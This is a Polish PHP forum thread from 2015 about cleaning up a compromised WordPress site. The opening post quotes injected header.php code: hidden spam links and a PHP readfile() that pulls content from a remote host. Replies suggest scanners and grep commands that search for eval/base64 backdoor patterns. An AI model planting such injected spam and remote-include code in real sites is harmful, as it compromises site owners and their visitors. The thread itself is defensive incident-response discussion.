Forum PHP.pl

Forum PHP.pl > Inne > Hydepark

Reply to this topic

Start new topic

Wirus in Wordpress

nospor Zobacz profil	4.05.2015, 14:06:09 Post #1
Grupa: Moderatorzy Postów: 36 557 Pomógł: 6315 Dołączył: 27.12.2004	Hejka, dostalem do analizy strone postawioną na WP, w ktorej w header w theme porto w header.php pojawilo sie takie cos: Kod <div id="zcs"> <a href="http://www.usercc.com">釣漁具</a> <a href="http://www.usercc.com">釣り道具</a> <a href="http://www.usercc.com">山口屋釣漁具｜｜釣り道具（釣り具）</a> <a href="http://www.kku4h.com/">釣り用品</a> <a href="http://www.kku4h.com/">フィッシング用品</a> <a href="http://www.kku4h.com/">釣り用品: フィッシング用品の通販</a> <a href="http://www.ecotoid.com">大阪漁具</a> <a href="http://www.ecotoid.com">鮎釣り道具</a> <a href="http://www.ecotoid.com">大阪漁具、鮎釣り道具、タモ網</a> <a href="http://www.tasmr.com/">中央漁具</a> <a href="http://www.tasmr.com/">大阪釣具</a> <a href="http://www.tasmr.com/">アメリカ屋漁具?中央漁具 - 漁具！大阪釣具</a> <a href="http://www.usercc.com">http://www.usercc.com</a> <a href="http://www.kku4h.com/">http://www.kku4h.com/</a> <a href="http://www.ecotoid.com">http://www.ecotoid.com</a> <a href="http://www.tasmr.com/">http://www.tasmr.com/</a> <a href="http://www.vapurtrail.com/">釣り道具</a> <a href="http://www.vapurtrail.com/">釣り用品</a> <a href="http://www.vapurtrail.com/">磯釣り道具</a> <a href="http://www.vapurtrail.com/">釣り道具、釣り用品必要なのかを分かりやすく紹介しています</a> <a href="http://www.ghmuk.com/">釣竿メーカー</a> <a href="http://www.ghmuk.com/">鮎釣り用品</a> <a href="http://www.ghmuk.com/">渓流釣り用品</a> <a href="http://www.ghmuk.com/">釣竿メーカー、渓流釣り鮎竿、釣り道具を探すなら岡野釣具店</a> <a href="http://www.danceani.com/">釣り用品</a> <a href="http://www.vapurtrail.com/">http://www.vapurtrail.com/</a> <a href="http://www.ghmuk.com/">http://www.ghmuk.com/</a> <script>document.getElementById('z'+'c'+'s').style.display='no'+'ne'</script></div> <?php readfile('http://remote2.iduun.net/link/dvd.txt'); ?> No i teraz próbuje dojść ktoredy to wlazło... Ftp i ssh zostały wykluczone przez admina, nie było żadnych takich połączen w wybranym czasie, wiec jakaś dziura w WP? Nie mogę za bardzo nic wygooglać. Wiem, że wp jest dziurawy jak ser szwajcarski.... Jedyna rada to być na bieżąco z aktualizacjami czy cos jeszcze? -------------------- *"Myśl, myśl, myśl..."* - Kubuś Puchatek \|\| *"Manual, manual, manual..."* - Kubuś Programista *"Szukaj, szukaj, szukaj..."* - Kubuś Odkrywca \|\| *"Debuguj, debuguj, debuguj..."* - Kubuś Developer

redeemer Zobacz profil	4.05.2015, 14:10:41 Post #2
Grupa: Zarejestrowani Postów: 915 Pomógł: 210 Dołączył: 8.09.2009 Skąd: Tomaszów Lubelski/Wrocław Ostrzeżenie: (0%)	http://wpscan.org/ + sprawdź ręcznie czy nie używasz starych wersji pluginów ze znanymi błędami. Cytat Ftp i ssh zostały wykluczone przez admina Nie traktowałbym tego jako wyrocznię. Przeskanuj też czy nie masz gdzieś jakiegoś backdoora (dodatkowy plik / zmodyfikowany plik wp). Ten post edytował redeemer 4.05.2015, 14:14:35 -------------------- blog.cinu.pl \| php-grinder.com

memory Zobacz profil	4.05.2015, 14:14:26 Post #3
Grupa: Zarejestrowani Postów: 616 Pomógł: 84 Dołączył: 29.11.2006 Skąd: bełchatów Ostrzeżenie: (0%)	https://wordpress.org/plugins/bulletproof-security/ lub inne pluginy typu Security Ten post edytował memory 4.05.2015, 14:16:28

redeemer Zobacz profil	4.05.2015, 14:16:33 Post #4
Grupa: Zarejestrowani Postów: 915 Pomógł: 210 Dołączył: 8.09.2009 Skąd: Tomaszów Lubelski/Wrocław Ostrzeżenie: (0%)	Cytat(memory @ 4.05.2015, 15:14:26 ) https://wordpress.org/plugins/bulletproof-security/ http://www.securityfocus.com/archive/1/533904 :-) -------------------- blog.cinu.pl \| php-grinder.com

memory Zobacz profil	4.05.2015, 14:17:41 Post #5
Grupa: Zarejestrowani Postów: 616 Pomógł: 84 Dołączył: 29.11.2006 Skąd: bełchatów Ostrzeżenie: (0%)	heehehe, pewnie zdążyli załatać Ten post edytował memory 4.05.2015, 14:19:44

redeemer Zobacz profil	4.05.2015, 14:22:25 Post #6
Grupa: Zarejestrowani Postów: 915 Pomógł: 210 Dołączył: 8.09.2009 Skąd: Tomaszów Lubelski/Wrocław Ostrzeżenie: (0%)	Cytat(memory @ 4.05.2015, 15:17:41 ) heehehe, pewnie zdążyli załatać To było "responsible disclosure", więc łata była od razu albo i wcześniej. Jednak IMHO nie wygląda to dobrze :-) -------------------- blog.cinu.pl \| php-grinder.com

nospor Zobacz profil	4.05.2015, 14:43:27 Post #7
Grupa: Moderatorzy Postów: 36 557 Pomógł: 6315 Dołączył: 27.12.2004	No ok, przelecialem tym wpscanem, faktycznie troche starowaty ten wp.... Cytat Przeskanuj też czy nie masz gdzieś jakiegoś backdoora Ale czym mam przeskanowac? -------------------- *"Myśl, myśl, myśl..."* - Kubuś Puchatek \|\| *"Manual, manual, manual..."* - Kubuś Programista *"Szukaj, szukaj, szukaj..."* - Kubuś Odkrywca \|\| *"Debuguj, debuguj, debuguj..."* - Kubuś Developer

redeemer Zobacz profil	4.05.2015, 18:15:24 Post #8
Grupa: Zarejestrowani Postów: 915 Pomógł: 210 Dołączył: 8.09.2009 Skąd: Tomaszów Lubelski/Wrocław Ostrzeżenie: (0%)	"Starowaty"? To upgrade - nad czym się tutaj zastanawiać? :-) Co do backoodorów, to są jakieś automatyczne skanery, ale najprościej jak porównasz pliki na serwerze z czystym wp (+ pluginami które masz). -------------------- blog.cinu.pl \| php-grinder.com

sazian Zobacz profil	4.05.2015, 19:16:59 Post #9
Grupa: Zarejestrowani Postów: 1 045 Pomógł: 141 Dołączył: 19.09.2006 Skąd: B-tów Ostrzeżenie: (0%)	spróbuj czegoś takiego Kod echo "error 0:" find . -type f -exec grep -q "@error_reporting(0)" '{}' \; -print echo "error 5:" find . -type f -exec grep -q "error_reporting(5)" '{}' \; -print echo "eval" find . -type f -exec grep -q "eval(base64_decode(" '{}' \; -print generalnie szukasz dziwnych fragmentów kodu zapisanych w base64 i wywołań przez eval ktoś musiał wgrać "panel administracyjny" przez jakiś dziurawy plugin lub przez ftp, a teraz ma pełen dostęp do serwera warto by również wyszukać i przeanalizować wszystkie pliki php które były edytowane przez np. ostatnie 30 dni

nospor Zobacz profil	5.05.2015, 11:21:44 Post #10
Grupa: Moderatorzy Postów: 36 557 Pomógł: 6315 Dołączył: 27.12.2004	@sazian pliki się zmienily raczej tylko header.php we wszystkich themes jakie były. Zastanawia mnie jednak fakt, ze razem z tą samą datą, co pliki header.php zostal rowniez zmieniony katalog PLUGINS, jednak w nim, nie widac zadnych plikow ze zmianą. Wygląda to wiec tak, jakby ktoś nagrał tam jakiś plik, poczym skasował. Miedzy nagraniem a skasowaniem mogl rzecz jasna jeszcze ten plik wykonac. Idzie jakos na serwerze znaleźć, czy odbyły się takie operacje: Nagranie po czym skasowanie pliku? -------------------- *"Myśl, myśl, myśl..."* - Kubuś Puchatek \|\| *"Manual, manual, manual..."* - Kubuś Programista *"Szukaj, szukaj, szukaj..."* - Kubuś Odkrywca \|\| *"Debuguj, debuguj, debuguj..."* - Kubuś Developer

sazian Zobacz profil	5.05.2015, 16:08:15 Post #11
Grupa: Zarejestrowani Postów: 1 045 Pomógł: 141 Dołączył: 19.09.2006 Skąd: B-tów Ostrzeżenie: (0%)	równie dobrze ktoś mógł zmienić datę edycji pliku, przez "panel administracyjny" masz pełen dostęp do shella

kreatiff Zobacz profil	5.05.2015, 17:33:41 Post #12
Grupa: Zarejestrowani Postów: 324 Pomógł: 105 Dołączył: 7.08.2012 Ostrzeżenie: (0%)	Może takie coś? http://www.forum.optymalizacja.com/topic/2...-ftp-od-yandex/ Warto przeczytać też posty innych użytkowników w tym temacie.

« Następny starszy · Hydepark · Następny nowszy »

Reply to this topic

Start new topic

1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Tryb wyświetlania: Standardowy · Przełącz na: Linearny+ · Przełącz na: Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

Aktualny czas: 20.08.2025 - 11:31

Powered By IP.Board © 2025 IPS, Inc.
All changes by PHP.pl Administrators

Hosting zapewnia

NQ.pl hosting, trac, svn